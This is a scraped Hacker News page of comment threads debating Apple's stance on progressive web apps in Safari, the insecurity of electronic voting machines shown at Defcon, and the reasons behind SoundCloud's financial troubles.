If apple supported PWA, I would've spent my time making the database keep a local syncing copy on the browser (with minimongo or pouchdb), and then every platform would've benefited from faster page loads and offline syncing.

Until Apple adds PWA support, I can't make as good stuff, and people can't use the better stuff.

jaffathecake 5 days ago 3 replies      
Safari engineers have attended all service worker working group meetings, and they do contribute. However, I do share the frustrations over transparency.

It's tough to get developers to care about things like offline-first, because it's tough for them to convince managers to allow them to spend time on a feature that won't work on iOS (since it won't work in Safari, and Apple has banned other browser engines on their platform).

Ultimately it's users that lose out but also the web as a platform, as it pushes people, like the author of the article, towards walled-garden solutions like native apps.

Apple is looking for service worker use-cases, so if it's something you're interested in, let them know https://lists.webkit.org/pipermail/webkit-dev/2017-July/0292....

pluma 5 days ago 8 replies      
I think push notifications and offline support are the real killer features that Apple currently doesn't support.

It's kind of funny as a web developer because for the longest time Apple seemed to be the one pushing the mobile web forward but now that web apps are reaching for feature parity with native, Apple's initial momentum seems to be ancient history.

It seems Apple still thinks of the mobile web as a content delivery platform rather than an application platform. Their proprietary additions (mostly CSS) largely focused on making things prettier, their rationale for opting out of standard features (e.g. autoplay) often only work under the assumption that the only use for those features would be in the context of traditional content pages.

You want an app? Develop for our walled garden we tightly control to offer our users the best possible experience. If you want it on the web, stick to creating content our users can consume in Mobile Safari, our app for reading websites.

rsynnott 5 days ago 3 replies      
As an iOS user, I'm actually quite glad that websites can't send me push notifications on it. And app loading screens are a feature?

If people _insist_ on making phone apps as websites, there's Cordova and all that. Such apps are never very good, of course. I still haven't seen a website-based desktop/phone app that wasn't a clunky non-native-looking resource-hogging mess.

nothis 5 days ago 3 replies      
IMO convoluted JavaScript hacks aren't the solution to "cross platform development" I'd want to settle on. Do I really want my weather app to be running on top of the browser app? And as far as cross-platform compatibility goes, we're now at a point where websites tell you to please load them with Chrome for the "full experience", that just reminds me of when websites used to tell you to please use Internet Explorer. So much for "Apple mobile Safari is the new Internet Explorer", lol. Push notifications for browsers are a weird concept, anyway.
interpol_p 5 days ago 12 replies      
I hate using web apps. On desktop, mobile, wherever. The author's list of things they want supported by Mobile Safari is just aggravating:

> Here are a list of things you still can't do with mobile safari due to Apple's refusal to support them:


> Create an app loading screen

> Use push notifications

> Add offline support

> Create an initial app UI to load instantly

> Prompt installation to the home screen through browser-guided dialog

Why do I want these things, as a user. App loading screens?

I love the web. I love hyperlinks, text and images. The web of connections that lead you to information. Everything in that list is detrimental to a good experience on the web.

I don't want push notifications, I barely enable them for native apps. And it bugs the hell out of me when every second website in desktop Safari prompts to send me push notifications. No. Why would I want this on mobile?

Same thing with the home screen. I love the fact that the address bar in my web browser is my history, my reminders, my bookmarks, my open tabs. I start typing what I want and I'm there. Finding native apps on my home screen is only just getting to the same place with Spotlight, why would I want to make the web worse by sticking icons for pages on my home screen?

And browser-guided dialogs to put more icons on my home screen? Seriously?

This author's post is a great argument against web apps on mobile.

ino 5 days ago 5 replies      
All browsers still suck at basic functionality.

Here's a quick short list of things that developers still have to write because the current implementations are broken, buggy, inconsistent or absent:

- Date pickers.

- Image upload [1].

- Autocomplete and datalist.

- Range pickers.

- Upload time remaining without javascript.

- Number min/max/step, use up/down keys to increment/decrement.

- Form elements that are unable to be styled by CSS.

- Color picker (arguably not as important as the others, and some OS color pickers suck anyway).

[1] Basic things like resize image on the browser prior to uploading. Size, aspect ratio, crop could be hinted by the html or chosen by the user. Server check is still needed, but upload size and times would be reduced drastically.

Shouldn't those be more important?

ebbv 5 days ago 0 replies      
Maybe I'm just an old fogey but I don't like Progress Web Apps. I think this whole movement of trying to make web apps more native-like is wrong headed and stems only from developers who have only ever written web apps wanting to write native apps but not wanting to learn how to do it properly.

As a user I don't want to have web apps giving me notifications or having loading screens. I have always liked that the web was tightly sandboxed and limited in what it can do. The nature of the web; where when I follow a link I'm basically installing your application -- sight unseen -- means that what your app can do needs to be tightly controlled and limited.

As a developer, if I want to make a native app for any platform, I'll write a native app. If you don't want to learn Objective-C or Swift, that's fine. There are plenty of ways to write native applications on iOS using cross-platform languages like C++.

Frankly, those languages are easier to write testable, dependable code in than JavaScript anyway.

Rjevski 5 days ago 0 replies      
PWAs and any of those Javascript-powered "apps" are shit. I am glad Apple is against them. Even the best JS apps with perfect UX (those are rare, but they exist) still feel relatively slow compared to a native counterpart.

I don't want to pay with UX if some "developers" can't be bothered to learn new languages and insist on doing JS everywhere.

illuminati1911 5 days ago 3 replies      
"all sorts of great features that youd normally associate with native apps, like push notifications, offline support, and app loading screensbut on the web! Awesome."

I didn't know app loading screens were "a great feature".

Anyway, I really don't see the point of PWAs or much future for them. Even if Apple started supporting these in Safari, the web apps still could not interact with different hardware components/sensors, iOS SDKs, etc.

React Native already brought a platform which allows making apps with native components and good performance with JS + decent access to hardware and iOS and still it's barely used outside of hobby projects.

I'm sorry, but native apps aren't going anywhere.

linopolus 5 days ago 1 reply      
As an iOS user, one thing I surely don't want is more web apps. The web is for content (including APIs used by native apps), not for apps, whether on desktop or mobile. Here's why:

- lower performance. It can't be as fast as native as long as there's still the browser underneath.
- non-native experience. I use iOS because I like it better than Android. I like the UI and UX, how it looks and feels. I don't want a web app, with a UI feeling different, looking different and behaving different.
- multi-platform. All platforms will never have the same capabilities and features. You will always have to use the least common denominator or hack your things around.

Apple provides ObjC and Swift, the latter being a terrific way to develop apps, in my humble opinion a far better language and environment than JS. Just use it, your users will thank you.

VeejayRampay 5 days ago 1 reply      
I'll just recycle a comment from a few days ago, it's (un)surprisingly fitting:

"You know the rule, Apple ALWAYS gets a pass. No matter what they do, no matter how bad they treat their customers, no matter how awful their "upgrades" are, no matter how non-configurable and locked-in their products get over time, no matter the lack of innovation for the past 5 years, they always get a pass. Deal with it, that Jobs residue works its magic for a loooooong time."

cjCamel 5 days ago 0 replies      
This is a frustrating article - the issue really is that Safari doesn't support Service Workers and Web App Manifests, which are the canonical way of making PWAs.

Safari should support Service Workers[1], because they allow you to safely intercept and modify navigation and resource requests, and cache resources in a very granular fashion, securely and on a different thread to your app JS. This is great for performance and offline/spotty reception.

The Web App Manifest[2] is the file that allows developers to "appify" the site, by prompting the user to add it to their home screen (only once they hit a certain usage rate), showing a splash screen, etc. But that's a nice-to-have compared to Service Workers.

[1]: https://developer.mozilla.org/en/docs/Web/API/Service_Worker...

[2]: https://developer.mozilla.org/en-US/docs/Web/Manifest
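For illustration, a minimal manifest.json of the kind described above might look like this (all values are hypothetical; see the MDN reference above for the full field list):

```json
{
  "name": "Example PWA",
  "short_name": "Example",
  "start_url": "/",
  "display": "standalone",
  "background_color": "#ffffff",
  "theme_color": "#2196f3",
  "icons": [
    { "src": "/icon-192.png", "sizes": "192x192", "type": "image/png" }
  ]
}
```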

waitwutt 5 days ago 0 replies      
What. Having a really hard time following what is exactly preventing the author from doing any of these:

> Create an app loading screen
> Use push notifications
> Add offline support
> Create an initial app UI to load instantly
> Prompt installation to the home screen through browser-guided dialog

All of these things are possible in Safari, no? It just doesn't support ServiceWorkers?

Aside: as a web security guy I think serviceworkers are a tragedy. Any crappy site you accidentally visit and immediately hit the back button on gets 10 minutes of freebie time to execute Javascript, roam your local network, exploit "slow" browser vulns, eat your bandwidth, etc. Gone are the days when the only things running Javascript are your open tabs.

jpttsn 5 days ago 1 reply      
OP builds part of this argument based on "Apple isn't responsive to my complaints about web apps."

Apple isn't responsive to complaints in general. Are they less responsive to web app complaints than other complaints? Otherwise, the argument holds no water.

josefwasinski 5 days ago 2 replies      
I can see why apple is hesitant to do this. But there is definitely a middle ground.

Require the same developer registration process as they currently do for iOS apps. Then require some apple provided javascript to provide access to these needed functions. App review as before.

At that point they can do interesting things: charge per 1000 installs, enforce the use of apple pay. They can operate a business model that is slightly different, but the same at its core - tax developers for access to their user base/platform.

programminggeek 5 days ago 0 replies      
I don't think Apple's customers are clamoring for Progressive Web App support as much as they are wanting other features.

The average customer (of which Apple has millions worldwide) wants a device that solves some basic desires like taking pictures, making phone calls, texting, email, etc.

I don't see how this feature serves enough of those customers for Apple to care more about it than something that will sell computers (in some form or another).

quadrangle 5 days ago 0 replies      
When I think "progressive web" I think of progressive enhancement. https://en.wikipedia.org/wiki/Progressive_enhancement i.e. make regular non-JavaScript websites as a foundation and add JavaScript just to enhance that.

I suppose this is a compatible idea, but the PWA idea is based on everything going in the wrong direction generally. PWA aims to make everything "app" like even when it's not warranted. The vast majority of apps and PWAs don't need to exist at all. People don't need all this JavaScript interactive excess.

What I like about PWAs: a move away from everyone downloading ridiculous numbers of apps for each website. What I don't like about PWAs: turning websites into apps when not needed.

jaxondu 5 days ago 0 replies      
As much as I want PWA to rule, web apps still deliver a noticeably worse experience than native, especially social apps with large feeds (Facebook, Twitter). After so many years chasing the native experience, it appears HTML/CSS/DOM needs to be revamped/replaced for there to be some hope. Maybe a brand new UX library built on top of WebAssembly? A cross-platform user interface library on top of Unity/Unreal Engine? Why must web apps rely on a browser in order to run? If there were a UX component to docker/containers, would it provide a similar security mechanism to a browser? Maybe this world is not meant to have only one language/UX library/delivery mechanism for apps.
aedron 5 days ago 3 replies      
Since the article did not go into details, and many of the points seem nonsensical, can someone elaborate?

Why can I not "Create an app loading screen" without service workers? Why can I not "Create an initial app UI to load instantly"? Seems these are trivially possible with regular Javascript, but maybe I'm misunderstanding?

Similarly, "Use push notifications", "Add offline support" and "Prompt installation to the home screen" do not sound like APIs that are dependent on service workers, but I guess they are? (or the article makes no sense)

(By the way, the 300ms tap delay that he gripes about can be hacked away, see fastclick.js)

chasing 5 days ago 0 replies      
> Apple thinks you should learn a completely different and more complex programming language (Objective-C/Swift) and maintain a completely separate code base for iOS. This effectively hurts small dev shops, stifles innovation, makes startups much more difficult to get going.

ObjC/Swift may be somewhat more complex than Javascript (or whatever) as programming languages, but one thing I like about iOS development right now is the relatively stable and well-integrated toolset.

I love web development. It's how I got started in all of this. But. The web development world is (in my eyes) currently an over-complex mess of standards and practices and tools coming from twenty different directions and sometimes changing radically from one year to the next. And I have complained before about the fact that Javascript is the primary language for using all of these. (I know, you use XXXScript which transpiles into Javascript. But that kind of adds evidence to my point, no?)

Anyway, this is not a central point to the article linked, but just something that caught my eye.

ivanbakel 5 days ago 0 replies      
>Is this just capitalism? Looking out for their own well being? No. Apple is filthy, filthy rich.

Naive much? People and corporations don't tend to stop collecting wealth - that is, after all, how they became so filthy, filthy rich in the first place.

rimliu 5 days ago 4 replies      
I am starting to get a vibe that there is a new breed of programmers who think that knowing just one language is good enough and learning anything else is "stifling innovation".

I don't even want to start on "PWAs work more seamlessly than native". I just cannot take person making such claims seriously.

millstone 5 days ago 0 replies      
> From now on, I wont be building any more native apps. All my apps going forward will be progressive web apps.

To be sure, the guy who wrote that has never built a native app and knows nothing of native development. That is not actually a story of a native developer being converted by PWAs.

Jyaif 5 days ago 1 reply      
Fundamentally, it's Apple's refusal to allow real 3rd party browsers that is the problem.
Ninn 5 days ago 0 replies      
This is definitely true. But in addition, it's insane that none of the big browsers appears to have begun implementing encrypted storage unlocked via touch and so forth.

One of the main arguments I see in my organisation for creating apps for our ventures is the fact that it will enable touch login. I reckon it should be rather simple to duplicate/wrap the localStorage API to do this?

archie_peach 4 days ago 2 replies      
A lot of people here seem to be advocating the superior experience that native apps provide, but forgetting how saturated the app market is and what a poor job Apple does to help its users discover new apps.

Further, the majority of US smartphone users download zero apps in a typical month. What's the point of making a "superior" app if no one is ever going to see it? https://qz.com/253618/most-smartphone-users-download-zero-ap...

From a user perspective, I care less about whether the app is a PWA or native, and more about the "goal" I'm trying to achieve. If my goal is to find a new house, a PWA allows me to instantly see results (without first having to download an app), then use native-like features such as being notified when new properties are available. I can use these features after I visit a given website and am prompted to save the app to my homescreen.

Compare this to the random native apps that people accumulate on their phone until it slows down so much that they have to perform an "app purge".

anderber 5 days ago 0 replies      
Wow, I read a lot of hate for PWAs, I had no idea. I use them and enjoy a lot of them (mobile.twitter.com). It really depends on the app, some benefit from being PWA others would need to be native. But the idea that we shouldn't add a feature that Chrome and other browsers have just because you personally don't like push notifications, seems silly.
frusciante19 5 days ago 0 replies      
Well, I would argue the web is a detriment to the web. Apple will never prioritise dev experience to the... detriment of user experience, no matter how many devs tears are shed. The author is arguing for better web developer experience, from what I read.
spo81rty 5 days ago 0 replies      
Apple doesn't want web applications to somehow replace apps in the app store. They make way too much money from their app store. Some of these key features like push notifications are the only reason to even make a native app, for some types of apps.
pavlakoos 5 days ago 0 replies      
So the author of this post is saying a developer with 9 years experience needs 6 months to learn ReactNative?

That doesn't sound encouraging...

dmix 4 days ago 0 replies      

> The apps implementing the standard are called progressive web applications, not to be confused with confusingly similar terms like progressive enhancement or responsive apps.

Front-end moves at the speed of light, I reckon it's hard to come up with original names...

My brain already has to remember thousands of software library names, techniques, argument orders, etc. Making your label distinct from other software names in the SAME niche is a good place to start if you want it to stick in people's brains.

martijn_himself 5 days ago 0 replies      
I'm not naive, and I understand the sentiment that part of Apple's motivation for not supporting these APIs in mobile Safari is to protect its App Store ecosystem.

BUT I also believe that Apple cares deeply about quality, and its MAIN reason to refuse support is to protect the quality of user experiences on its iOS platform and steer developers to its native APIs, which produce vastly superior apps.

It would take Apple years of wasted effort to guarantee similar experiences in the browser.

summadat 5 days ago 1 reply      
"Apple's refusal to support my chosen development platform means that Apple is holding back the entire web" ...really?
nimish 5 days ago 0 replies      
PWAs are still inferior to real native apps. The FT's webclip "app" is ass compared to the NYT's nice, native one.
ex3ndr 5 days ago 0 replies      
Why do I need to download a 15MB JS file for your fancy "offline" web app? Even native apps are usually smaller.
jmull 4 days ago 0 replies      
Frankly, it seems like PWA is a solution for web developers looking to deploy lowest-common-denominator, "unnative" apps more widely, more easily.

That's fine for them, but ultimately, I think we've got far too many apps with crappy UIs.

So what's the real value to the platform, and to the people who use it, of another source of them?

perfectstorm 5 days ago 1 reply      
how good are these PWAs? are there any apps already out there on Android? I'm curious to see how well they perform compared to a native iOS app.
velcro 5 days ago 2 replies      
Officially, Apple's reasoning for barring Flash was that the web should be pushed forward. Now, almost 8 years later, when the web is "almost there", it's still hindering real web-app experiences in the iOS browser. It's pretty clear what this was always about.

--(Please let's not do the fanboy "Flash is garbage" thing here: even if you do feel it was heating up your CPU with ads, it would have taken a lot less than 8 years to fix that than to reinvent everything and find out that money still makes the world go round.)--

MaxLeiter 4 days ago 0 replies      
Kind of a different use case, but I work on a web-based IRC client (self-hosted IRC cloud), and if Apple supported service workers we could have improved offline support, push notifications (for mentions, disconnects, etc.), on-device caching of embeds (links and images are embedded in-line), an improved loading screen, and more.
gregblass 4 days ago 0 replies      
Author here. Pretty overwhelmed and astonished with all this. Can't wait to read through all these comments!
shmerl 5 days ago 0 replies      
Apple just need to mess things up for everyone. They wouldn't be Apple otherwise.
Pigo 5 days ago 1 reply      
Can someone explain the difference between progressive web apps and webRTC? Are they related, or completely separate technologies? I just heard about them around the same time, and it seems like they have some things in common.
wuliwong 4 days ago 1 reply      
I'm pretty late to this party, so it probably has already been asked but what specific things need to be supported by mobile Safari to run a PWA?
rezashirazian 4 days ago 0 replies      
I hope this never happens. I despise Javascript.
lurcio 5 days ago 1 reply      
Please.... anything but Active Desktop again
vbezhenar 5 days ago 0 replies      
Apple will do anything to keep control over iOS apps. Web won't allow them to get their 30% margin, so they will do anything to force developers stay in AppStore.
mrkrabo 5 days ago 0 replies      
Google thinking webpages can be as good as native applications is a detriment to the UX.
Hacking Voting Machines at Defcon horner.tj
282 points by maxerickson  1 day ago   224 comments top 21
vowelless 1 day ago 12 replies      
I used to think electronic voting was the logical next step. But now, I think voting is too important to be left to electronics. It should be done on paper.

We trust billions of dollars every day to electronic banking, so why not a vote? Electronic banking comes with many types of federal guarantees to protect against fraud. The government can step in to investigate and prosecute the fraud as well. But there is no such guarantee for the voting to select the government itself!

"But it takes so long to aggregate the votes if done with paper ballots." Precisely the point. Electronic voting allows scalable attacks because the number of weak points is dramatically reduced. It is very hard to scale attacks on paper ballots: you would need a coordinated effort across many voting stations, as opposed to hacking a more central electronic system.

That is why I moved from thinking that electronic voting is the logical next step to thinking that we probably need to revert back to paper ballots.

Klathmon 1 day ago 3 replies      
Electronic voting is dangerous and is a very bad idea. Voting should be done on paper, using pencils, put into ballot boxes, and counted by people.

Paper works, and it works well. It's a system that has worked well enough for thousands of years, and we have figured out most of the issues with it during that time. Anyone that can count can validate a single precinct. You can have one person, or 100 people all standing there watching a ballot box all day for tampering. You can have a whole group of people count the results, or just a few.

In a traditional paper system, swaying a single precinct with "blackhat" methods takes a lot of physical resources, a lot of time, and in most cases a lot of people. Then multiply that by every precinct in the country, and it quickly becomes pretty much impossible to do and get away with. Plus it leaves a physical "paper trail" (in the form of payment for people, communications, and physical materials or the receipts for those materials).

Electronic voting gives us very few benefits, and a significant amount of downsides. And it doesn't matter if it's FOSS, it doesn't matter if it's vetted, it doesn't matter what safeguards are put in place, all it takes is one mistake. One fuckup, and someone can now choose the leader of a nation, and in some cases that leader can change the rules of the next election, meaning it only takes one single mistake to ruin it for many many generations in the future.

And replacing a system that literally everyone can validate on voting day, if they want to, with a system where only a fraction of a fraction of people can even read and understand the code, let alone validate it (and they can't actually validate the hardware, or make sure what is running on the hardware is actually that code, or make sure the hardware is even what it says it is), and where doing so takes a magnitude more time, just isn't a good idea.

cyborgx7 1 day ago 1 reply      
The Chaos Computer Club did some extensive educational work a couple of years back to make sure we keep our paper ballots here in Germany. And this work continues to this day. I'm very grateful, seeing all the issues we are avoiding because of it, but the fight against misinformed or malicious politicians is still going on.

A very important factor in their work was making sure people called them "voting computers" instead of "voting machines". Most people by now have a sense that computers are hackable and insecure, if only from movies where hackers can hack every system. Calling them machines gives people the sense that they are unhackable mechanical appliances.

iainmerrick 23 hours ago 0 replies      
I think the key problem with electronic voting is the possibility of a "class break", as explained here by Bruce Schneier: https://www.schneier.com/blog/archives/2017/01/class_breaks....

If there's a flaw in the system -- and there will be flaws, the only question is how soon they're found -- there's a risk that the whole thing can be compromised in one fell swoop.

Whereas pen and paper voting, counted by hand, is slower and less accurate and has plenty of its own flaws, but there's no simple way to compromise the entire vote at once. You'd have to fool a whole bunch of different people in different ways, and/or recruit them into a huge conspiracy.

Other countries use pen and paper and it works fine. Electronic voting machines should be banned.

Canada 1 day ago 1 reply      
After more than a decade of security researchers raising the alarm over critical electronic voting machine vulnerabilities, I hope this finally causes some real demand for verifiable ballots.
tcbawo 1 day ago 1 reply      
I am not a fan of electronic voting as it exists today. But, I expected to see someone advocate a blockchain-like trail to ensure election integrity.

Also, why don't we have automatic voter registration? Let's pay this cost once and move on.

cobookman 1 day ago 1 reply      
I'm for both. Aka, you submit your ballot on paper, and have both a machine and people count the votes. If the machine count has a different outcome from the people count, then you know you've got an issue.

By outcome I mean something like: the machine count had person A winning, the people count has person B.

corpMaverick 1 day ago 1 reply      
In my country, a losing presidential candidate has been able to convince part of his base that there was electronic fraud using an "algorithm", even though the whole process was done manually. Imagine if it had really been done electronically. That is why I am convinced voting should be done with paper and pencils.
tribby 18 hours ago 0 replies      
I like paper voting but there should be a holiday and the vote should be mandatory even if only to check off "none of the above." The reason I like electronic despite its flaws is someone can do it while on the toilet, and here in the US where there is low turnout and voter suppression, that's about where I want the bar to be.
em3rgent0rdr 17 hours ago 1 reply      
Where is the memory card physically stored? Is that something that a hacker could easily gain access to without being noticed?
elbac 1 day ago 0 replies      
There is an excellent podcast series on the subject of electronic voting, where several experts give their opinions.


After listening, I became convinced that electronic/internet voting is a terrible idea.

alistproducer2 1 day ago 2 replies      
I'm old enough to remember when e-voting was brought about by the Bush administration. At the time, those of us on the far left were convinced that Bush was the American incarnation of Hitler (seems quaint now, doesn't it) and Diebold e-voting machines were going to precipitate the end of democracy.
thrillgore 1 day ago 2 replies      
Put us back on paper ballots. Christ, some systems should be as simple as possible.
em3rgent0rdr 17 hours ago 0 replies      
Voting needs something called "homomorphic encryption", which allows simple arithmetic to be performed on encrypted data without decrypting it.
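To make that concrete, here is a toy, deliberately insecure sketch of one such scheme (Paillier, which is additively homomorphic): multiplying two ciphertexts produces an encryption of the sum of the plaintexts, so encrypted precinct subtotals can be combined without decrypting any individual one. The tiny hard-coded primes are for illustration only; a real voting scheme needs far more, such as large random keys, zero-knowledge proofs that each ballot encrypts a valid vote, and threshold decryption.

```javascript
// Toy Paillier cryptosystem with g = n + 1. Multiplying ciphertexts
// mod n^2 adds the underlying plaintexts. NOT secure: tiny fixed primes.
function modpow(base, exp, mod) {          // square-and-multiply on BigInt
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

function modinv(a, m) {                    // modular inverse via extended Euclid
  let [old_r, r] = [a % m, m];
  let [old_s, s] = [1n, 0n];
  while (r !== 0n) {
    const q = old_r / r;
    [old_r, r] = [r, old_r - q * r];
    [old_s, s] = [s, old_s - q * s];
  }
  return ((old_s % m) + m) % m;
}

const p = 293n, q = 433n;                  // toy primes, illustration only
const n = p * q, n2 = n * n;
const phi = (p - 1n) * (q - 1n);
const mu = modinv(phi, n);                 // phi^{-1} mod n

function encrypt(m, r) {                   // r is random, coprime to n
  // (1+n)^m = 1 + m*n (mod n^2), so Enc(m, r) = (1 + m*n) * r^n mod n^2
  return ((1n + m * n) * modpow(r, n, n2)) % n2;
}

function decrypt(c) {
  const L = (modpow(c, phi, n2) - 1n) / n; // L(u) = (u - 1) / n
  return (L * mu) % n;
}

// Two precincts report encrypted subtotals; anyone can multiply the
// ciphertexts, and only the key holder learns the combined tally.
const c1 = encrypt(3n, 17n);               // 3 votes, random r = 17
const c2 = encrypt(5n, 101n);              // 5 votes, random r = 101
const tally = decrypt((c1 * c2) % n2);     // decrypts to 8n
```

The homomorphic property is what lets the sum be computed over ciphertexts; it says nothing about voter coercion, ballot validity, or who holds the decryption key, which is why it is only one ingredient of a voting system.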
bdz 1 day ago 0 replies      
I'm more surprised that you can buy voting machines from eBay
jvandonsel 1 day ago 1 reply      
A voting machine with frickin' open USB and Ethernet ports?
UltimateFloofy 1 day ago 0 replies      
Very nice. Voter McVoteyFace deserves an upvote.
miheermunjal 1 day ago 3 replies      
this just re-stresses the need for COMPETITION in the electronic voting space. If you had a monopoly over the systems, what encouragement would you have to upgrade them? There are all sorts of ways to innovate in "e-voting", and all of them would be improvements over the current US methods
lngnmn 1 day ago 0 replies      
One word: Microsoft.
5trokerac3 1 day ago 1 reply      
Depending on how conspiratorially minded you are, being able to exfiltrate/alter voter rolls could be seen as more of a feature than a bug.
dec0dedab0de 1 day ago 7 replies      
Every time this comes up, it seems to me that the obvious answer is that we should get rid of the secret ballot. If everyone's vote is public then everyone can check that their own vote was counted correctly. I know the argument is that people may face pressure at home and be afraid to vote, but is there anyone left who doesn't tell everyone how they voted? Maybe I'm living in a bubble, but I know exactly who all of my friends, and family voted for, none of them ever tried to keep it a secret.
SoundCloud's Collapse buzzfeed.com
406 points by prostoalex  2 days ago   319 comments top 42
sgentle 2 days ago 8 replies      
Never do a music industry startup unless you have a billion dollars, can raise a billion dollars, or plan to be acquired by a company with a billion dollars to spare. That's the table stakes for going toe-to-toe with the big three.

They'll bleed you to death with licensing fees, deputise you into their copyright enforcement police, upload their songs to your platform on one hand while suing you with the other, and all the while cry about how extracting monopoly profits is so much harder than in the old days.

Just go disrupt something safer, like organised crime or the international diamond trade. At least with those the law probably won't change out from under you.

bogomipz 2 days ago 2 replies      
>"In November 2014, SoundCloud closed a deal with Warner Music Group, giving the label an undisclosed cut of revenue from ads, a 3%-5% stake in the company and protection against past copyright infringement from the label."

This sounds like terms dictated by the Mob. It's quite telling that the deal also conferred ownership on a content holder in order to be able to license and pay handsomely for their content. This is only one of the big 4 they were negotiating with too. By the time they get done negotiation with the other 3 they would have likely given up 15% of the company. Note the big 4 all have stakes in Spotify as well[1].

At any rate, I think this should have been a sign that they were going down the wrong path. Propping up these labels and hitching your wagon to them, only to have to constantly renegotiate your deal every couple of years, seems contrary to a platform that gave artists direct access to music fans without the middleman.

[1] http://www.swedishwire.com/jobs/680-record-labels-part-owner...

k-mcgrady 2 days ago 2 replies      
SoundCloud could have been a nice business if they hadn't got greedy. From the beginning (or close to it) there have been various paid accounts for artists which a lot of people used. SoundCloud was the best place to discover new music from unsigned artists. There were unsigned artists with tracks on it that blew up and eventually got picked up by major labels.


- SoundCloud neglected the platform.

- Then they did one of the worst redesigns of any site I've seen (try reordering a track in your spotlight [paid feature] in Chrome. Crashes the tab and has done for years. I need to open another browser to do that.).

- Then it became overrun with major label artists.

- Then they started offering features just to the big artists - various UI/branding options - (forgetting about the artists that got them to where they were).

- Then they did the whole paid streaming mess which they were never going to succeed in. Anybody could have told them that, I really don't believe anyone in that company thought 'Go' would work. I think they just needed to do something.

I'm not sure if they've taken so much money now that this isn't possible anymore, but if I were CEO I would take it back to its roots. Focus on the unsigned artists. Fix the site. Offer a distribution system (like CDBaby/TuneCore) so that SoundCloud can be a one-stop shop for unsigned artists. Now you've got paid accounts (for stats/spotlight/unlimited upload space) and a small cut of distribution on all paid platforms.

I don't understand how in a world where more artists are getting big without label help nobody is offering a great platform for them. SoundCloud got very close in the past. BandCamp has gotten close too (although it lacks the social/sharing/viral aspect of SoundCloud). If SoundCloud does end up shutting down it's due to greed and poor management. Instead of focusing on what they do well and what people use them for they've tried to go after the money and they were much too late making that move to get any of it.

iagooar 2 days ago 10 replies      
This shows us, that company valuations are ridiculous and actually mean nothing.

Is SoundCloud worth a billion dollars? Well, it might be on paper or in the imaginations of the founders, but what does it really mean? To me, it's worth nothing.

The real problem is: these companies start to operate from the perspective of "having" those millions of dollars. This is why they hire too many people for too much money. They spend hundreds of thousands on marketing.

But in the end, you know what? They need to beg for money to pay their debts. They need to lay off dozens of employees because they don't have the money to pay them.

What if SoundCloud would have kept a small, yet highly skilled engineering team of maybe ~20 people, some marketing and sales, and try to not outgrow themselves? Probably they'd be having a huge surplus each year because their costs would be small and sustained.

When I read stories like these, I actually feel good about my bootstrapped, down-to-earth startup. We don't make millions, we don't "disrupt" the industry, yet we solve our customers' problems and delight them. We won't ever run out of money, as we carefully check each and every expenditure, and have growing savings in the bank.

kowdermeister 2 days ago 1 reply      
"Jeff Toig's preferred PowerPoint style is size 10 Arial font with a black background. An earlier version of this story misstated the color."

This is the funniest correction I've ever read :)

xfer 2 days ago 4 replies      
> According to one former SoundCloud Berlin employee, a lack of direction from Wahlforss, who served as chief technology officer, made things worse, with some engineers going rogue and rebuilding their colleagues work in their preferred programming language.

Does this happen at other startups?

thinbeige 2 days ago 4 replies      
I read this article a few hours earlier while crawling through the new section. It's a surprisingly interesting piece from Buzzfeed, but there's a lot of bashing of the CEO, the CTO and one recently hired senior for label relations (who seems to be really odd).

This is typical: SoundCloud was an iconic company, its founders worshiped and idealized. Once money runs out, people but especially former employees start to backstab, blaspheme and blame loud and clearly. Why not before? Now when everybody is hitting SoundCloud it's easy and risk-free to join the hate. All the NDAs they once signed seem to be gone? To be fired also means fire and forget for them.

I never believed in SoundCloud. The founders did a great job building a huge brand and DNA out of nothing but the business model is by design broken or to put it simply, you just can't do business with music labels.

Btw, where is Fred Wilson? The biggest proponent and investor of SoundCloud who didn't miss an opportunity to tell us that sound is the future stays silent and hasn't commented this tragedy once. A VC just for good times?

EDIT: Why the downvotes? Mind to share your view?

bogomipz 2 days ago 1 reply      
Not showing up to company retreats, circulating pictures of yourself taking private jets and hanging out with celebrities in Ibiza, doing a Ferragamo ad - CEO Alexander Ljung sounds like Erlich Bachman.

It's easy to write those things off as petty gripes, but I think they are important in that they illustrate a CEO who doesn't understand that those are bad "optics" for employees who are seeing layoffs and a lack of funds to hire talent. And a CEO who doesn't see the nuances here might also miss the nuances of lots of other important areas of the business. Why does the board not remove him?

whofailed 2 days ago 3 replies      
Contrarian here:

SoundCloud is an incredibly valuable property. They have obviously had a few managerial cock-ups, but in reality they have massive user buy-in and a huge network effect, and anyone who can get some equity in them during this current period of massive negative sentiment is going to do VERY WELL. I wish I had a way to buy in at this point.

ThomPete 2 days ago 0 replies      
After 4 1/2 years at Square, a colleague of mine and I left to start our own portfolio of small productivity tools, some of which we are building ourselves and others we will probably be acquiring.

Our first rule was that we would not take funding for anything other than scaling a business once it hits some sort of product-market fit.

Until then, there is only bootstrapping. This is to avoid something like SoundCloud, where you become numb to the hard reality of needing to build a business before you build an organization, buy foosball tables and promote your altruistic business principles.

nunez 1 day ago 0 replies      
I haven't used SoundCloud that much, but the last time I seriously used it was in late 2015 for finding solid trap music. Finding unsigned material was a lot easier in 2014 than in 2015; everything in the first few pages was from huge signed artists.

I also gave Go a chance so I could download stuff I liked onto my iPhone. It was such a confusing service. I paid $9.99/mo to download tracks. There was no way to download albums. It was also difficult to find things that I wanted to hear. I cancelled after a month or so.

TekMol 2 days ago 0 replies      
Is there a collapse? They used their VC money to pay employees to build stuff. Now the money is spent. Employees get laid off.

It could very well have been worth it. What has been built might bring a return on investment for a long time.

Isn't that normal? Isn't VC money intended to be used that way? Are VCs demanding to build jobs for eternity? Or is there some moral reason to not grow and shrink the work force while building a company?

sddfd 2 days ago 0 replies      
What I never understood was why they were opening offices in SF, NY, and London, without having the revenue to back them up.

In my eyes that was just flushing huge amounts of money down the drain.

Briel 1 day ago 0 replies      
There's a lot of focus on how they failed: strayed from their non-label musician roots.

But how would they have been able to monetize?

* Let fans support their favorite musicians a la Patreon and take a % from the donations?

* Partner with music labels to help them scout their next upcoming talents?

* Help musicians book shows at venues and take a % of the sales?

parasubvert 1 day ago 1 reply      
Open source remains an important force of continuity for technology professionals, as even though SoundCloud is failing, they brought us a very important piece of infrastructure that will carry on: http://Prometheus.io

It has been catching on like wildfire everywhere I look, even big conservative companies. It feels like the new Nagios (in a good way).

Mikho 17 hours ago 0 replies      
